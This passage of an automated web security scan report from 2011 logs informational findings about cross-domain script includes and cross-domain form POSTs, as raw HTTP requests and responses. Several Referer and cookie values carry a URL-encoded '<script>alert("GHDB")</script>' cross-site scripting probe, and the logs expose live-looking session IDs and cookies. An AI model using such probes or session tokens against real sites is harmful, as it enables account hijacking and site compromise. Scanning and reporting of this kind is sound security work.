twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_
...[SNIP]...

Request 2

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161350-10080-54358
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:10 GMT
X-RateLimit-Remaining: 129
X-Runtime: 0.01342
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: db4f6e0fed08d24a6d74c64bfbf06a2810e5acc0
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161350025304; path=/; expires=Thu, 19-May-11 00:49:10 GMT; domain=.twitter.com
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCI67reEvAToHaWQiJWI0MGUyNjQwZTEwOTFh%250ANzExYmZlYWZjNzIwOTBiNDU2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--d3651f4a554063478772f4d2e0326f845fcfac72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_enabled":false,"geo_enabled":false,"profile_sidebar_border_color":"BDDCAD","id":16990708,"u
...[SNIP]...

16.2. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.18.37
X-Cnection: close
Date: Thu, 12 May 2011 00:46:02 GMT
Content-Length: 7533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dca5addf7404454917" class="connect_widget" style="font-family: &quot;verdana&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=job-search-engine.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.job-search-engine.com%2Fkeyword%2Fnumber-portability%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.130.55
X-Cnection: close
Date: Thu, 12 May 2011 00:46:14 GMT
Content-Length: 7363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dd65f0b65615158696" class="connect_widget" style="font-family: &quot;verdana&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a c
...[SNIP]...

16.3. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Request 1

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:46:53 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 431


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

Request 2

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:47:34 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 295


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

17. Cross-domain POST  previous  next
There are 8 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


17.1. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anpisolutions.com
Path:   /wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Issue detail

The page contains a form which POSTs data to the domain anpisolutions.web4.hubspot.com. The form contains the following fields:

Request

GET /wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/ HTTP/1.1
Host: www.anpisolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:05 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Accept-Ranges: bytes
X-Pingback: http://www.anpisolutions.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/html; charset=UTF-8
Content-Length: 23377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<img width="197" height="47" border="0" alt="Learn how to save 25% or more on your SS7 costs" src="/wp-content/uploads/SS7Inquiry.jpg" />
<form action="http://anpisolutions.web4.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26732" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.anpisolutions.com/thank-you-for-your-interest-in-signaling-network-and-database-services" >
...[SNIP]...

17.2. http://www.onwav.com/lnp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onwav.com
Path:   /lnp

Issue detail

The page contains a form which POSTs data to the domain paytrace.com. The form contains the following fields:

Request

GET /lnp HTTP/1.1
Host: www.onwav.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: dancer.session=893606761925970901924588756288095317; path=/; HttpOnly
X-Powered-By: Perl Dancer 1.3011
Date: Thu, 12 May 2011 00:48:31 GMT
Connection: keep-alive
Content-Length: 3893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>OnWav</title>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<div id="payfloat">
<form action='https://paytrace.com/cart/donate.pay' method=post>
<p>
...[SNIP]...

17.3. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.4. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.5. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.6. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.7. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
